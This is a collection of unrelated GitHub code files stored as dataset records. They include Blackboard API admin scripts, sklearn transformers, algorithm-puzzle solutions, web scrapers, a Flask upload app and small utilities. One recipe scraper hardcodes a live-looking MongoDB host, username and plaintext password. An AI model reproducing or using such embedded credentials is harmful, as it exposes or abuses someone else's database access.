['NAC-DevCon1', 'NAC-DevCon2', 'NAC-DevCon3']\nfor course in courses:\n r = bb.CreateMembership(userId='m500d520', courseId=course, payload={'courseRoleId':'Instructor'})\n print(r.status_code)\n\n\n#%%\nimport random\nrandom.choice(courses)\n\n\n#%%\nrandom.choice(courses)\n\n\n#%%\nfor student in students:\n userName = student['userName']\n course = random.choice(courses)\n r = bb.CreateMembership(userId=userName, courseId=course, payload={})\n if r.status_code == 201:\n print(f'Added {userName} to {course}')\n else:\n print(r.text)\n\n#%% [markdown]\n# ## 2. Getting a User's Last accessed courses\n# This is the start of some useful reporting, and can help focuse the search space for grade or access data.\n\n#%%\nr = bb.GetUserMemberships('m500d520', \n params={'lastAccessed':'2019-07-01',\n 'lastAccessedCompare':'greaterOrEqual'})\nr.json()\n\n\n#%%\ncourses = r.json()['results']\nfor course in courses:\n courseId = course['courseId']\n r = bb.GetCourse(courseId)\n course_info = r.json()\n print(course_info['name'])\n\n#%% [markdown]\n# ## 3. Disabling and enabling a user and a course\n# Sometimes SIS integrations cause issues. We use SAIP, and courses have been disabled when a section changes and enrollments have been disabled when a student changes sections. Here are quick ways to correct this with the API.\n\n#%%\n#Causing course and user to be disabled on purpose\nr1 = bb.UpdateCourse('NAC-DevCon2', payload={'availability':{'available':'Disabled'}})\nr2 = bb.UpdateMembership(userId='m500d520', courseId='NAC-DevCon1', payload={'availability':{'available':'Disabled'}})\n\nprint(r1.json())\nprint(r2.json())\n\n\n#%%\nr1 = bb.UpdateCourse('NAC-DevCon2', payload={'availability':{'available':'Yes'}})\nr2 = bb.UpdateMembership(userId='m500d520', courseId='NAC-DevCon1', payload={'availability':{'available':'Yes'}})\n\nprint(r1.json())\nprint(r2.json())\n\n#%% [markdown]\n# # Clean-up\n# Run this after the other demonstrations. 
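#%%
# Editor's note (hedged): fake.name() and fake.random_number() can repeat, so
# the generated userName values are not guaranteed unique -- the 201 check
# above already skips the resulting failed creates. For reproducible demo
# data, Faker supports seeding:
# Faker.seed(4321)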
You need the users, courses and memberships for the next two Notebooks. \n\n#%%\nfor user in [student['externalId'] for student in students]:\n r = bb.DeleteUser(f'externalId:{user}')\n print(r.status_code)\n\n\n#%%\nfor course in ['NAC-DevCon1', 'NAC-DevCon2', 'NAC-DevCon3']:\n r = bb.DeleteMembership(courseId=course, userId='m500d520')\n r = bb.DeleteCourse(course)\n print(r.status_code)\n\n\n#%%\n\n\n\n","repo_name":"mdeakyne/BbRestExamples","sub_path":"1SysAdmins.py","file_name":"1SysAdmins.py","file_ext":"py","file_size_in_byte":5157,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"31424294239","text":"from sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import OrdinalEncoder\nimport pandas as pd\nimport numpy as np\nfrom sklearn.experimental import enable_iterative_imputer\nfrom sklearn.impute import IterativeImputer\n\n\nclass BigMartNameCleaning(BaseEstimator, TransformerMixin):\n def __init__(self):\n super().__init__()\n\n def fit(self, X, y=None, **kwargs):\n return self\n\n def transform(self, X, y=None, **kwargs):\n # Do Transformation Here\n if X is None:\n raise ValueError('Input the data')\n X = X.copy()\n X = self.predict(X)\n return X\n\n def predict(self, X, y=None, **kwargs):\n if X is None:\n raise ValueError('Input the data')\n X = X.copy()\n\n for value in X['Item_Identifier']:\n if 'FD' in value:\n X['Item_Identifier'] = X['Item_Identifier'].replace(value, 'FD')\n elif 'DR' in value:\n X['Item_Identifier'] = X['Item_Identifier'].replace(value, 'DR')\n elif 'NC' in value:\n X['Item_Identifier'] = X['Item_Identifier'].replace(value, 'NC')\n\n X['Item_Fat_Content'].replace({'reg': 'Regular',\n 'low fat': 'Low Fat',\n 'LF': 'Low Fat'}, inplace=True)\n X['Item_Fat_Content'][X['Item_Identifier'].str.contains('NC')] = 'Non Consumable'\n return X\n\n\nclass BigMartFeatureEncoding(BaseEstimator, TransformerMixin):\n\n def __init__(self):\n super().__init__()\n\n def fit(self, X, y=None, **kwargs):\n if X is None:\n raise ValueError('Input the data')\n\n self.cat_list = list(\n X.select_dtypes(include=['category', 'object', 'bool']).columns)\n\n for col in self.cat_list:\n X[col] = X.astype('object')\n\n self.X_encoding = X.select_dtypes(include=[np.object])\n self.X_rest = X.select_dtypes(exclude=[np.object])\n\n self.oe = OrdinalEncoder()\n self.oe.fit(self.X_encoding)\n\n return self\n\n def transform(self, X, y=None, **kwargs):\n # Do Transformation Here\n if X is None:\n raise ValueError('Input the data')\n X = X.copy()\n X = self.predict(X)\n return X\n\n def predict(self, X, y=None, **kwargs):\n # Include all other columns\n self.cat_list = list(\n X.select_dtypes(include=['category', 'object', 'bool']).columns)\n\n for col in self.cat_list:\n X[col] = X.astype('object')\n\n self.X_encoding = X.select_dtypes(include=[np.object])\n self.X_rest = X.select_dtypes(exclude=[np.object])\n\n self.X_encoded = pd.DataFrame(self.oe.transform(self.X_encoding),\n columns=self.X_encoding.columns)\n\n self.X_encoded.reset_index(drop=True, inplace=True)\n self.X_rest.reset_index(drop=True, inplace=True)\n\n X_out = pd.concat([self.X_encoded, self.X_rest], axis=1)\n X = X_out.reindex(X.columns, axis=1)\n return X\n\n\nclass BigMartFeatureImputation(BaseEstimator, TransformerMixin):\n def __init__(self):\n super().__init__()\n\n def fit(self, X, y=None, **kwargs):\n # Only numerical here\n if X is None:\n raise ValueError('Input the data')\n\n self.X_numerical = 
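# Editor's note (hedged): two portability fixes for the encoder above.
# np.object was deprecated in NumPy 1.20 and removed in 1.24; use
# select_dtypes(include=['object']) instead. And X[col] = X.astype('object')
# casts the whole frame on every iteration; the per-column form is presumably
# what was intended:
# X[col] = X[col].astype('object')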
X.select_dtypes(include='number')\n self.imputer_num = IterativeImputer()\n self.imputer_num.fit(self.X_numerical)\n\n return self\n\n def predict(self, X, y=None, **kwargs):\n X = X.copy()\n # transform here\n\n self.cat_list = list(\n X.select_dtypes(include=['category', 'object', 'bool']).columns)\n\n for col in self.cat_list:\n X[col] = X.astype('object')\n\n self.X_categorical = X.select_dtypes(include=[np.object])\n self.X_numerical = X.select_dtypes(include=['number'])\n\n self.X_numerical_encoded = pd.DataFrame(self.imputer_num.transform(self.X_numerical),\n columns=self.X_numerical.columns)\n\n self.X_categorical = self.X_categorical.fillna('Missing')\n\n self.X_numerical_encoded.reset_index(drop=True, inplace=True)\n self.X_categorical.reset_index(drop=True, inplace=True)\n\n X_out = pd.concat([self.X_numerical_encoded, self.X_categorical], axis=1)\n X = X_out.reindex(X.columns, axis=1)\n\n return X\n\n def transform(self, X, y=None, **kwargs):\n # Do Transformation Here\n if X is None:\n raise ValueError('Input the data')\n X = X.copy()\n X = self.predict(X)\n return X\n","repo_name":"iameminmammadov/bigmart","sub_path":"packages/datacube_bigmart/datacube_bigmart/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":4647,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"13027865837","text":"def body(start, stop):\n for i in range(start, stop):\n result = i\n char_num = str(i)\n for c in char_num:\n result += int(c)\n # for j in range(len(char_num)):\n # result += int(char_num[j])\n if result == stop:\n return i\n return 0\n\n\ndef answer(n):\n x = 9 * len(str(n))\n if x >= n:\n return body(0, n)\n else:\n return body(n-x, n)\n\n\nn = int(input())\nprint(answer(n))\n","repo_name":"jenych0314/BOJ_PYTHON","sub_path":"Solve/2231_분해합_20210609.py","file_name":"2231_분해합_20210609.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"7995626261","text":"from collections import defaultdict\n\nclass Solution(object):\n def findThePrefixCommonArray(self, A, B):\n da = defaultdict(int)\n db = defaultdict(int)\n n = len(A)\n res = []\n cnt = 0\n for i in xrange(n):\n a, b = A[i], B[i]\n da[a] += 1\n db[b] += 1\n if a == b:\n cnt += 1\n else:\n cnt += 1 if da[a] <= db[a] else 0\n cnt += 1 if da[b] >= db[b] else 0\n res.append(cnt)\n \n return res\n","repo_name":"Wizmann/ACM-ICPC","sub_path":"Leetcode/Algorithm/python/3000/02657-Find the Prefix Common Array of Two Arrays.py","file_name":"02657-Find the Prefix Common Array of Two Arrays.py","file_ext":"py","file_size_in_byte":549,"program_lang":"python","lang":"en","doc_type":"code","stars":63,"dataset":"github-code","pt":"79"} +{"seq_id":"23043717694","text":"import json, os, logging\nfrom datetime import datetime\n\n\nclass HttpHandler(logging.Handler):\n today_date = datetime.now().strftime(\"%Y-%m-%d\")\n\n def emit(self, record):\n try:\n request = record.request\n record.ip = request.META.get('HTTP_X_FORWARDED_FOR')\n record.test = 'test'\n f = open(\n f'{os.fspath(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))}/{self.today_date}_debug.log',\n 'a')\n f.write(f'[ {record.ip} ] ')\n except Exception:\n pass\n\n\ndef create_log_content(request):\n meta_data_of_request = request.META\n request_info_string = ' || USER-IP: ' + meta_data_of_request.get('HTTP_X_FORWARDED_FOR')\n request_info_string += ' || PATH_INFO: ' + 
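# Editor's note (hedged): an equivalent O(n) Python 3 formulation of the
# prefix-common count above, tracking membership with sets instead of
# per-value counters (the original uses Python 2's xrange):
def find_prefix_common(A, B):
    seen_a, seen_b, out, cnt = set(), set(), [], 0
    for a, b in zip(A, B):
        if a == b:
            cnt += 1              # the shared value joins both prefixes now
        else:
            if a in seen_b:
                cnt += 1          # B's prefix already contained a
            if b in seen_a:
                cnt += 1          # A's prefix already contained b
        seen_a.add(a)
        seen_b.add(b)
        out.append(cnt)
    return out
# find_prefix_common([1, 3, 2, 4], [3, 1, 2, 4]) -> [0, 2, 3, 4]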
meta_data_of_request.get('PATH_INFO')\n request_info_string += ' || QUERY_STRING: ' + meta_data_of_request.get('QUERY_STRING')\n request_info_string += ' || REQUEST_METHOD: ' + meta_data_of_request.get('REQUEST_METHOD')\n request_info_string += ' || HTTP_USER_AGENT: ' + meta_data_of_request.get('HTTP_USER_AGENT').split(' ')[0]\n request_info_string += ' || REQUEST_BODY: ' + json.dumps(dict(request.data))\n\n return request_info_string + '\\n\\n'\n","repo_name":"lee-sanghwa/hoxymetoo","sub_path":"hoxymetoo/create_log.py","file_name":"create_log.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"34391119445","text":"# @Time : 2023/9/26 10:36\nimport copy\ndef fun(nums: list):\n result = [[], ]\n ls = []\n backtraceing(nums, result, ls, 1)\n return result\n\n\ndef backtraceing(nums: list, result, ls, begin):\n if begin == len(nums)+1:\n return\n for i in range(begin, len(nums)+1):\n ls.append(i)\n result.append(copy.deepcopy(ls))\n backtraceing(nums, result, ls, i + 1)\n ls.pop()\n\n\nif __name__ == '__main__':\n nums = [1, 2, 3,4]\n print(fun(nums))\n","repo_name":"hchgod/leetcode","sub_path":"刷题笔记/leetcode/LC78.py","file_name":"LC78.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70053711937","text":"\"\"\"Version of str(timedelta) which is not English specific.\"\"\"\n\n\ndef duration_string(duration):\n days = duration.days\n seconds = duration.seconds\n microseconds = duration.microseconds\n\n minutes = seconds // 60\n seconds = seconds % 60\n\n hours = minutes // 60\n minutes = minutes % 60\n\n string = '{:02d}:{:02d}:{:02d}'.format(hours, minutes, seconds)\n if days:\n string = '{} '.format(days) + string\n if microseconds:\n string += '.{:06d}'.format(microseconds)\n\n return string\n","repo_name":"zhl2008/awd-platform","sub_path":"web_hxb2/lib/python3.5/site-packages/django/utils/duration.py","file_name":"duration.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","stars":574,"dataset":"github-code","pt":"79"} +{"seq_id":"34065599857","text":"from django.urls import path\nfrom . 
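# Editor's note (hedged): in the LC78 backtracking above, ls only ever holds
# ints, so a shallow copy suffices and is cheaper than copy.deepcopy:
# result.append(ls[:])
# The `begin == len(nums) + 1` base case is also redundant, since the for-loop
# range is already empty at that point.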
import views\nfrom .views import CarsList, CarDetail, UpdateCar, AddCar, DeleteCar\n\nurlpatterns = [\n path('owner/', views.owners, name='owners'),\n path('owner/', views.owner, name='owner'),\n path('add_person/', views.add_person),\n path('cars/', CarsList.as_view()),\n path('cars/', CarDetail.as_view()),\n path('cars//update/', UpdateCar.as_view()),\n path('add_car/', AddCar.as_view()),\n path('cars//delete/', DeleteCar.as_view())\n]","repo_name":"TonikX/ITMO_ICT_WebDevelopment_2020-2021","sub_path":"students/K33402/Ivanova_Inessa/simple_django_web_project/project_first_app/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"13003553693","text":"\"\"\"Utility functions.\"\"\"\n\nimport glob\nimport logging\nimport os\nimport sys\n\nlogger = logging.getLogger(__name__)\n\n\ndef critical(msg: str, force_exit: bool = False) -> None:\n \"\"\"\n Prints a critical error message and exits the application.\n :param msg: Error message\n :param force_exit: Exit the application without calling cleanup handlers\n \"\"\"\n logger.critical(msg)\n if force_exit:\n os._exit(1)\n sys.exit(1)\n\n\ndef check_root() -> None:\n \"\"\"Verifies root privileges.\"\"\"\n if os.geteuid() != 0:\n critical('root privileges required')\n\n\ndef check_acpi_call_module() -> None:\n \"\"\"Verifies the presence of the `acpi_call` kernel module.\"\"\"\n if not os.path.exists('/proc/acpi/call'):\n critical('kernel module acpi_call is not loaded')\n\n\ndef is_on_ac() -> bool:\n \"\"\"\n Checks if the system is using AC as the power source.\n :return: True if on AC\n \"\"\"\n paths = glob.glob('/sys/class/power_supply/AC*/online')\n for path in paths:\n with open(path, encoding='utf_8') as f:\n return int(f.read()) == 1\n # Otherwise assume AC\n return True\n","repo_name":"xsmile/ryzen-ppd","sub_path":"ryzen_ppd/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1121,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"79"} +{"seq_id":"72020090176","text":"import pygame as p\nfrom GameLogic import *\nfrom human import playVShuman\nfrom dumbPC import playVSdpc\nfrom smartPC import playVSspc\nfrom drawANDtype import drawXO\n \n# Window size is 600x600 so we divide coordinates by 200 to get the positions on the board array\ndef getSpot(ttt): \n ttt.spot[0] = ttt.mouse[1] // 200\n ttt.spot[1] = ttt.mouse[0] // 200\n \n# Graphics logic\ndef playGraphics(ttt, scr):\n if ttt.graphics == True:\n p.init()\n bg = (0, 0, 0) # background\n lines = (0, 255, 255)\n \n clock = p.time.Clock()\n \n while ttt.playing:\n clock.tick(120)\n # I am using a buffer instead of screen because it is easier to keep all the drawings on the screen while playing\n # How it works is whatever we draw on the buffer will be applied each frame onto the screen\n # This way we don't have to draw one by one thing but we can draw everything at once onto buffer and then apply it onto the screen\n scr.buffer.fill(bg) \n scr.screen.blit(scr.buffer, (0, 0))\n \n p.draw.line(scr.buffer, lines, (200,0), (200, 600), 3)\n p.draw.line(scr.buffer, lines, (405,0), (405, 600), 3)\n p.draw.line(scr.buffer, lines, (0,200), (600, 200), 3)\n p.draw.line(scr.buffer, lines, (0,405), (600, 405), 3)\n \n p.display.flip()\n \n # Logic that checks what type of game are we playing\n # It also checks when the left mouse click is pressed and where\n if ttt.human == True and ttt.end == False:\n for 
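# Editor's note (hedged): is_on_ac() above returns after reading the first
# AC supply it matches and assumes AC when none is found; if a machine exposes
# several AC adapters, any-of semantics would be:
# return any(int(open(p).read()) == 1 for p in paths) if paths else True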
event in p.event.get():\n if event.type == p.QUIT:\n ttt.playing = False\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 1:\n ttt.mouse[0], ttt.mouse[1] = p.mouse.get_pos()\n getSpot(ttt)\n playVShuman(ttt)\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 3:\n if ttt.end == True:\n newGame(ttt)\n \n drawXO(ttt, scr)\n scr.screen.blit(scr.buffer, (0, 0)) \n p.display.flip()\n \n elif ttt.dpc == True and ttt.end == False:\n if ttt.x == True:\n playVSdpc(ttt)\n \n for event in p.event.get():\n if event.type == p.QUIT:\n ttt.playing = False\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 1:\n ttt.mouse[0], ttt.mouse[1] = p.mouse.get_pos()\n getSpot(ttt)\n playVSdpc(ttt)\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 3:\n if ttt.end == True:\n newGame(ttt)\n \n drawXO(ttt, scr)\n scr.screen.blit(scr.buffer, (0, 0)) \n p.display.flip()\n \n elif ttt.spc == True and ttt.end == False:\n if ttt.x == True:\n playVSspc(ttt)\n \n for event in p.event.get():\n if event.type == p.QUIT:\n ttt.playing = False\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 1:\n ttt.mouse[0], ttt.mouse[1] = p.mouse.get_pos()\n getSpot(ttt)\n playVSspc(ttt)\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 3:\n if ttt.end == True:\n newGame(ttt)\n \n drawXO(ttt, scr)\n scr.screen.blit(scr.buffer, (0, 0)) \n p.display.flip()\n \n elif ttt.end == True:\n for event in p.event.get():\n if event.type == p.QUIT:\n ttt.playing = False\n \n elif event.type == p.MOUSEBUTTONDOWN and event.button == 3:\n if ttt.end == True:\n newGame(ttt)\n \n drawXO(ttt, scr)\n scr.screen.blit(scr.buffer, (0, 0)) \n p.display.flip() \n \n p.quit()\n ","repo_name":"WolfComrad/CMPS-455-555","sub_path":"Fall 2023/Slavco Stevic's TicTacToe/GameGraphics.py","file_name":"GameGraphics.py","file_ext":"py","file_size_in_byte":4678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"13710310","text":"import datetime\nimport random\nfrom dataclasses import dataclass\n\nfrom fake import fake\n\n\n@dataclass\nclass ConferenceBooking:\n TABLE = 'conference_booking'\n ID = 0\n\n id: int\n conference_id: int\n client_id: int\n booking_date: datetime\n\n @staticmethod\n def __post_init__():\n ConferenceBooking.ID += 1\n\n @staticmethod\n def random(db):\n result = []\n for cl in random.choices(db.client, k=int(len(db.client) // 1.2)):\n for conf in random.choices(db.conference, k=random.randint(0, 3)):\n date = None\n for cd in db.conference_day:\n if cd.conference_id == conf.id:\n date = cd.start_date\n break\n\n if date > datetime.datetime.now():\n date = datetime.datetime.now()\n\n date_before = date - datetime.timedelta(weeks=20)\n\n result.append(ConferenceBooking(\n ConferenceBooking.ID,\n conf.id,\n cl.id,\n fake.date_time_between(\n start_date=date_before,\n end_date=date)))\n\n return result\n","repo_name":"piotrek-szczygiel/conferences-sql-generator","sub_path":"table/conference_booking.py","file_name":"conference_booking.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"79"} +{"seq_id":"24391211230","text":"# Author :lixinhao\n\nimport random\ndef roll_s(numbers = 3,s_list = None):\n print('<<>>')\n if s_list is None:\n s_list = []\n while numbers > 0:\n s = random.randrange(1,7)\n s_list.append(s)\n numbers = numbers - 1\n return s_list\n\ndef roll_b(tt):\n big = 11 <= tt <= 18\n small = 3 <= tt <= 10\n if big:\n return '大'\n 
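# Editor's note (hedged): random.choices() in ConferenceBooking.random above
# samples WITH replacement, so the same client/conference pair can be booked
# more than once; random.sample() yields distinct picks when duplicate
# bookings are unwanted:
# for cl in random.sample(db.client, k=int(len(db.client) // 1.2)):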
elif small:\n return '小'\n\ndef game_s():\n money = 1000\n while money > 0:\n print('<<<游戏开始!>>>')\n c = ['大', '小']\n input_c = input('请输入大或小:')\n if input_c in c:\n tt = sum(roll_s())\n win = input_c == roll_b(tt)\n money_c = int(input('请输入押注金额:'))\n if win:\n print('点数',tt,'你赢了')\n money = money + money_c\n print('剩余金额:{}'.format(money))\n else:\n print('点数',tt,'你输了')\n money = money - money_c\n print('剩余金额:{}'.format(money))\n else:\n print('不符合条件,重新输入')\n print('游戏结束')\ngame_s()","repo_name":"shumeng283/record","sub_path":"押注骰子.py","file_name":"押注骰子.py","file_ext":"py","file_size_in_byte":1186,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"35439485080","text":"import heapq\ndef solution(operations):\n heap = []\n maxheap = []\n visit = [0]*1000001\n n = len(operations)\n for i in range(n):\n in_de, num = operations[i].split()\n if in_de == 'I':\n heapq.heappush(heap, (int(num), i))\n heapq.heappush(maxheap, (-1 * int(num), i))\n visit[i] = 1\n elif num == '1':\n while maxheap and visit[maxheap[0][1]]==0:\n heapq.heappop(maxheap)\n if maxheap:\n visit[maxheap[0][1]] = 0\n heapq.heappop(maxheap)\n else:\n while heap and visit[heap[0][1]] == 0:\n heapq.heappop(heap)\n if heap:\n visit[heap[0][1]] = 0\n heapq.heappop(heap)\n while maxheap and visit[maxheap[0][1]] == 0:\n heapq.heappop(maxheap)\n while heap and visit[heap[0][1]] == 0:\n heapq.heappop(heap)\n if maxheap and heap:\n answer = [-maxheap[0][0], heap[0][0]]\n return answer\n else:\n return[0, 0]\n","repo_name":"Mingdoo/coding_test_boom","sub_path":"211031/승영/이중우선순위큐/s1.py","file_name":"s1.py","file_ext":"py","file_size_in_byte":1032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"36625126789","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def largestValues(self, root):\n res = []\n def dfs(curr,curHeight):\n if not curr:\n return\n if curHeight == len(res):\n res.append(curr.val)\n else:\n res[curHeight] = max(res[curHeight],curr.val)\n dfs(curr.left, curHeight + 1)\n dfs(curr.right, curHeight + 1)\n dfs(root,0)\n return res\n\n","repo_name":"random-char1198/al-go-rithm","sub_path":"leetcode/tree/find_larget_value_in_each_tree_row_515.py","file_name":"find_larget_value_in_each_tree_row_515.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"38349212348","text":"import re\r\n\r\nfrom bs4 import BeautifulSoup\r\nfrom urllib import request\r\nimport pymongo\r\nimport sys\r\n\r\nclear_database = False\r\nurl_main = \"17851\"\r\n\r\n# some sites close their content for 'bots', so user-agent must be supplied\r\nHEADERS = {\r\n 'User-Agent': 'Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.7) Gecko/2009021910 Firefox/3.0.7'\r\n}\r\n\r\ndef acceptedIngredients():\r\n\treturn [item[:-1] for item in open(\"res/ingredients.txt\")]\r\n\r\ndef ignoreIngredients():\r\n return [item[:-1] for item in open(\"res/ignore_words.txt\")]\r\n\r\ndef singleConversionDict():\r\n\titem_dict = dict()\r\n\tfor item in open(\"res/ingredients_mass.txt\"):\r\n\t\tline = item.split(',')\r\n\t\tif item and item[0] != '#' and len(line)>1:\r\n\t\t\titem_dict[line[0]] = float(line[1])\r\n\treturn item_dict\r\n\r\ndef cupConversionDict():\r\n\titem_dict = dict()\r\n\tfor item in 
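# Editor's note (hedged): the double-ended priority queue above uses the
# classic lazy-deletion trick: every insert goes into both a min-heap and a
# negated max-heap tagged with its operation index, visit[i] marks liveness,
# and stale tops are popped from either heap before each delete and before the
# final [max, min] answer is read.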
open(\"res/cup_conversion.txt\"):\r\n\t\tline=item.split(',')\r\n\t\tif item and item[0] != '#' and len(line)>1:\r\n\t\t\titem_dict[line[0]] = float(line[1])\r\n\treturn item_dict\r\n\r\n\r\nif len(sys.argv) > 1:\r\n\turl_main = sys.argv[1]\r\nDB_NAME = 'heroku_w26bwb75' \r\nDB_HOST = 'ds129030.mlab.com'\r\nDB_PORT = 29030\r\nDB_USER = 'heroku_w26bwb75'\r\nDB_PASS = 'i8jeeblr2rai5ab8h8n4ts7to3'\r\n\r\nconnection = pymongo.MongoClient(DB_HOST, DB_PORT)\r\ndb = connection[DB_NAME]\r\ndb.authenticate(DB_USER, DB_PASS)\r\n\r\nrecipe_collection = db['recipes']\r\ningredient_collection = db['ingredients']\r\n#ingredient_collection.create_index( 'ingredient' )\r\n\r\nif clear_database:\r\n recipe_collection.delete_many({})\r\n ingredient_collection.delete_many({})\r\n\r\nall_recipes = []\r\n\r\nfor k in list(recipe_collection.find()):\r\n\tall_recipes.append(k['recipe'])\r\n\r\nitems = acceptedIngredients()\r\nsingle_weight = singleConversionDict()\r\ncup_conversion = cupConversionDict()\r\nignore = ignoreIngredients()\r\n\r\nprint(ignore)\r\n\r\ndef normalize_string(string):\r\n return re.sub(\r\n r'\\s+', ' ',\r\n string.replace(\r\n '\\xa0', ' ').replace( #  \r\n '\\n', ' ').replace(\r\n '\\t', ' ').strip()\r\n )\r\n\r\n\r\ndef processIngredient(recipe, item, amount):\r\n\t\r\n\tingredient_collection.insert_one(\r\n\t\t{\r\n\t\t\t\"recipe\": recipe,\r\n\t\t\t\"ingredient\": item.lower(),\r\n\t\t\t\"mass\": amount\r\n\t\t}\r\n\t)\r\n\r\ndef addRecipe(name, URL, serving, count):\r\n\trecipe_collection.insert_one(\r\n {\r\n \"recipe\": name,\r\n \"url\": URL,\r\n \"serving\": serving,\r\n\t\t\t\"num_ingred\": count\r\n }\r\n )\r\n\r\ndef addToDatabase(name, all_ingredients, URL, serving):\r\n\tcount = 0\r\n\tfor i in all_ingredients:\r\n\t\tfor ingredient in items:\r\n\t\t\tif ingredient.lower() in i.lower():\r\n\t\t\t\t\r\n\t\t\t\tounce = re.search('(?<=\\()[0-9]+.*[0-9]*(?= *ounce)', i)\r\n\t\t\t\tamount = 0.\r\n\t\t\t\tif ounce:\r\n\t\t\t\t\tamount = float(ounce.group()) * 28.35\r\n\t\t\t\telse:\r\n\t\t\t\t\tcup = re.search('[0-9]+ *[0-9]*/*[0-9]*(?= *cup)', i)\r\n\t\t\t\t\tif cup and ingredient.lower() in cup_conversion:\r\n\t\t\t\t\t\tdigits = cup.group().split(\" \")\r\n\t\t\t\t\t\tval = 0\r\n\t\t\t\t\t\tfract = digits[0]\r\n\t\t\t\t\t\tif len(digits) == 2:\r\n\t\t\t\t\t\t\tfract = digits[1]\r\n\t\t\t\t\t\t\tval += float(digits[0])\r\n\t\t\t\t\t\tfract_list = fract.split(\"/\")\r\n\t\t\t\t\t\tif len(fract_list)==2:\r\n\t\t\t\t\t\t\tval += float(fract_list[0])/float(fract_list[1])\r\n\t\t\t\t\t\telif fract:\r\n\t\t\t\t\t\t\r\n\t\t\t\t\t\t\tval += float(fract)\r\n\t\t\t\t\t\tamount = cup_conversion[ingredient.lower()] * val\r\n\t\t\t\t\telif cup:\r\n\t\t\t\t\t\tcontinue\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tb_ignore = False\r\n\t\t\t\t\t\tfor ignore_i in ignore:\r\n\t\t\t\t\t\t\tif ignore_i in i.lower():\r\n\t\t\t\t\t\t\t\tb_ignore = True\r\n\t\t\t\t\t\tif b_ignore:\r\n\t\t\t\t\t\t\tcontinue\r\n\t\t\t\t\t\tamount = int(re.search(r'\\d+', i).group())\r\n\t\t\t\t\t\tfor single_item in single_weight:\r\n\t\t\t\t\t\t\tif single_item.lower() in i.lower():\r\n\t\t\t\t\t\t\t\tamount = single_weight[single_item] * amount\r\n\t\t\t\t\r\n\t\t\t\tprocessIngredient(name, ingredient, amount)\r\n\t\t\t\tcount += 1\r\n\t\t\t\tbreak\r\n\tif count > 0:\r\n\t\taddRecipe(name, URL, serving, count)\r\n\r\ndef getInfo(URL):\r\n\tsoup = BeautifulSoup(request.urlopen(\r\n request.Request(URL, headers=HEADERS)).read(), \"html.parser\")\r\n\tname = soup.find('h1').get_text()\r\n\r\n\tif name in 
all_recipes:\r\n\t\treturn\r\n\r\n\tingredients_html = soup.findAll('li', {'class': \"checkList__line\"})\r\n\tingredient_list = [ normalize_string(ingredient.get_text()) \r\n\tfor ingredient in ingredients_html\r\n\t if ingredient.get_text(strip=True) not in ('Add all ingredients to list', '','Advertisement') ]\r\n\tserving_html = soup.findAll('meta', {'id': \"metaRecipeServings\"})\r\n\tserving = serving_html[0].get(\"content\")\r\n\taddToDatabase(name, ingredient_list, URL, serving)\r\n\tall_recipes.append(name)\r\n\treturn ingredient_list\r\n\r\nsoup = BeautifulSoup(request.urlopen(\r\n request.Request(\"http://allrecipes.com/recipes/\" + url_main, headers=HEADERS)).read(), \"html.parser\")\r\n\r\ntopRecipes = soup.findAll('ar-save-item', {'class': \"favorite\"})\r\n\r\n#print(topRecipes[0])\r\n\r\nrecipe_list = []\r\n\r\nfor recipe_web in topRecipes:\r\n\trecipe_list.append(recipe_web.get(\"data-id\"))\r\n\r\n#recipe_list = ['103737']\r\n\r\nfor recipe_id in recipe_list:\r\n\tprint(recipe_id)\r\n\ttarget_url = 'http://allrecipes.com/recipe/' + recipe_id\r\n\tscrap = getInfo(target_url)\r\n\t#print(scrap)\r\n\t#input()\r\n\r\n\r\n","repo_name":"welll5678/turnip_beats_server","sub_path":"Py3Scraper.py","file_name":"Py3Scraper.py","file_ext":"py","file_size_in_byte":5098,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"10571279905","text":"# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\n\nclass Solution(object):\n\n def binaryTreePaths(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: List[str]\n \"\"\"\n sol = []\n if not root:\n return sol\n\n def __dfs__(node, curr):\n if node is None:\n return\n\n if not node.left and not node.right:\n s = str(curr[0].val)\n for x in curr[1:]:\n tmp = \"->\" + 